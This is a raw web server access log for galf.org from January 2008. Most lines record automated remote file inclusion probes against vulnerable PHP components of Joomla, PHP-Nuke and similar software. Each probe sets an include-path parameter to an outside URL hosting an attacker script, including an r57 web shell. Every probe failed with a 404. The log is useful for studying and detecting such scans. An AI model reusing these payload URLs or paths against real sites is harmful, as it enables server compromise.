193.138.204.132 - - [27/Jan/2008:17:14:00 -0800] "GET /logs/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.138.204.132 - - [27/Jan/2008:17:14:00 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.138.204.132 - - [27/Jan/2008:17:14:01 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.138.204.132 - - [27/Jan/2008:17:14:01 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:15:10 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:17:15:34 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:17:15:34 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.189.225.85 - - [27/Jan/2008:17:15:59 -0800] "GET /logs/access_071217.log/modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:17:16:03 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:17:16:03 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:16:14 -0800] "GET /logs/access_071105.log/main.php?page=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:16:15 -0800] "GET /main.php?page=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:16:15 -0800] "GET /logs/main.php?page=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.10.208.226 - - [27/Jan/2008:17:17:51 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.10.208.226 - - [27/Jan/2008:17:17:51 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:18:42 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:18:43 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:19:18 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:19:18 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.92.23.94 - - [27/Jan/2008:17:19:21 -0800] "GET /errors.php?error=http://safetest.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
212.92.23.94 - - [27/Jan/2008:17:19:21 -0800] "GET /logs/errors.php?error=http://safetest.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:17:19:47 -0800] "GET /logs/access_070827.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:17:19:48 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:17:19:48 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.26.137.64 - - [27/Jan/2008:17:20:40 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
89.128.155.135 - - [27/Jan/2008:17:23:06 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
89.128.155.135 - - [27/Jan/2008:17:23:06 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
89.128.155.135 - - [27/Jan/2008:17:23:07 -0800] "GET / HTTP/1.1" 200 1048 "http://www.ahige.org/lista_enlaces.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
89.128.155.135 - - [27/Jan/2008:17:23:08 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
89.128.155.135 - - [27/Jan/2008:17:23:08 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:24:20 -0800] "GET /logs/access_070827.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:24:20 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:24:20 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.212.28.43 - - [27/Jan/2008:17:24:27 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
66.212.28.43 - - [27/Jan/2008:17:24:27 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:17:24:53 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:17:24:54 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.140.91.131 - - [27/Jan/2008:17:25:54 -0800] "GET /logs/access.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.140.91.131 - - [27/Jan/2008:17:25:55 -0800] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.140.91.131 - - [27/Jan/2008:17:25:55 -0800] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:26:07 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:17:26:50 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:17:26:50 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:27:32 -0800] "GET /logs/access_070827.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:27:32 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:27:32 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.96.247.163 - - [27/Jan/2008:17:27:39 -0800] "GET /index.php?go=http://scottmouse.no-ip.biz/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:17:28:14 -0800] "GET /logs/access_070827.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:17:28:15 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:17:28:16 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
222.234.1.78 - - [27/Jan/2008:17:28:25 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.234.1.78 - - [27/Jan/2008:17:28:26 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.229.132.194 - - [27/Jan/2008:17:29:10 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.229.132.194 - - [27/Jan/2008:17:29:11 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
8.6.223.5 - - [27/Jan/2008:17:29:23 -0800] "GET /index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:17:29:33 -0800] "GET /logs/access_071210.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
196.22.136.106 - - [27/Jan/2008:17:29:59 -0800] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
196.22.136.106 - - [27/Jan/2008:17:30:00 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.106.68.149 - - [27/Jan/2008:17:30:43 -0800] "GET /index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.89.224.76 - - [27/Jan/2008:17:31:17 -0800] "GET /logs/access_080121.log HTTP/1.0" 200 7680601 "-" "Wget/1.10.2" "galf.org"
88.218.97.19 - - [27/Jan/2008:17:31:25 -0800] "GET /logs/access_071210.log//modules/agendax/addevent.inc.php?agendax_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.30.216.100 - - [27/Jan/2008:17:31:51 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:32:08 -0800] "GET /logs/access_080107.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.107 - - [27/Jan/2008:17:33:37 -0800] "GET /logs/access.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://weblime.ru/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.107 - - [27/Jan/2008:17:33:37 -0800] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://weblime.ru/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.107 - - [27/Jan/2008:17:33:37 -0800] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://weblime.ru/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.10.226.36 - - [27/Jan/2008:17:33:43 -0800] "GET /RFIhttp://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:17:34:15 -0800] "GET /logs//admin/stats.php/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:17:34:15 -0800] "GET //admin/stats.php/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.85.98.2 - - [27/Jan/2008:17:35:26 -0800] "GET //auto.php?inc=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.233.63.80 - - [27/Jan/2008:17:35:52 -0800] "GET /index.php3?page=http://www.ministerioelshadday.com.br/language/portugues.do.brasil/envirfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:17:35:54 -0800] "GET /logs/access_071217.log/index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.75.35.118 - - [27/Jan/2008:17:36:26 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [27/Jan/2008:17:36:26 -0800] "GET /modules/My_eGallery/index.php?basepath=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.94.1.95 - - [27/Jan/2008:17:37:44 -0800] "GET /logs/access_071217.log/modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.240.89 - - [27/Jan/2008:17:37:46 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.240.89 - - [27/Jan/2008:17:37:46 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.67.237.143 - - [27/Jan/2008:17:38:00 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.67.237.143 - - [27/Jan/2008:17:38:00 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.67.237.143 - - [27/Jan/2008:17:38:00 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.colorsplashpaintball.com/enhanced/components/com_extcalendar/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.67.237.143 - - [27/Jan/2008:17:38:01 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.67.237.143 - - [27/Jan/2008:17:38:01 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.67.237.143 - - [27/Jan/2008:17:38:01 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.colorsplashpaintball.com/enhanced/components/com_extcalendar/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:39:02 -0800] "GET /logs/access_080107.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.233.63.80 - - [27/Jan/2008:17:41:14 -0800] "GET /logs/scripts.log/index.php3?page=http://www.ministerioelshadday.com.br/language/portugues.do.brasil/envirfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.233.63.80 - - [27/Jan/2008:17:41:14 -0800] "GET /logs/index.php3?page=http://www.ministerioelshadday.com.br/language/portugues.do.brasil/envirfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:17:41:32 -0800] "GET /logs/access_071217.log/index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:17:42:30 -0800] "GET /logs/access_080107.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:44:29 -0800] "GET /logs/access_070827.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:44:29 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:44:29 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
72.30.216.100 - - [27/Jan/2008:17:44:44 -0800] "GET /logs/access_071210.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.212.28.43 - - [27/Jan/2008:17:45:34 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
66.212.28.43 - - [27/Jan/2008:17:45:34 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
8.6.223.5 - - [27/Jan/2008:17:45:53 -0800] "GET /logs/access_071224.log/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.5 - - [27/Jan/2008:17:45:54 -0800] "GET /logs/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.5 - - [27/Jan/2008:17:46:00 -0800] "GET /logs/access_070827.log/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:46:22 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:46:22 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:46:22 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.239.18 - - [27/Jan/2008:17:46:33 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eastlink.hu/kina/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
70.86.239.18 - - [27/Jan/2008:17:46:33 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eastlink.hu/kina/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
70.86.239.18 - - [27/Jan/2008:17:46:33 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://eastlink.hu/kina/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
70.86.239.18 - - [27/Jan/2008:17:46:33 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://eastlink.hu/kina/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:46:41 -0800] "GET /logs/access_070827.log//sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:46:41 -0800] "GET //sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:46:41 -0800] "GET /logs//sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.218.85.18 - - [27/Jan/2008:17:47:02 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://no.spam.ee/~tonu/phpshell/r57shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:47:21 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:47:22 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:47:22 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:17:47:38 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.242.3.251 - - [27/Jan/2008:17:47:51 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://lurejewelry.com/12all/admin/images/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
195.242.3.251 - - [27/Jan/2008:17:47:51 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://lurejewelry.com/12all/admin/images/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
195.242.3.251 - - [27/Jan/2008:17:47:51 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://lurejewelry.com/12all/admin/images/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
218.103.8.225 - - [27/Jan/2008:17:49:08 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
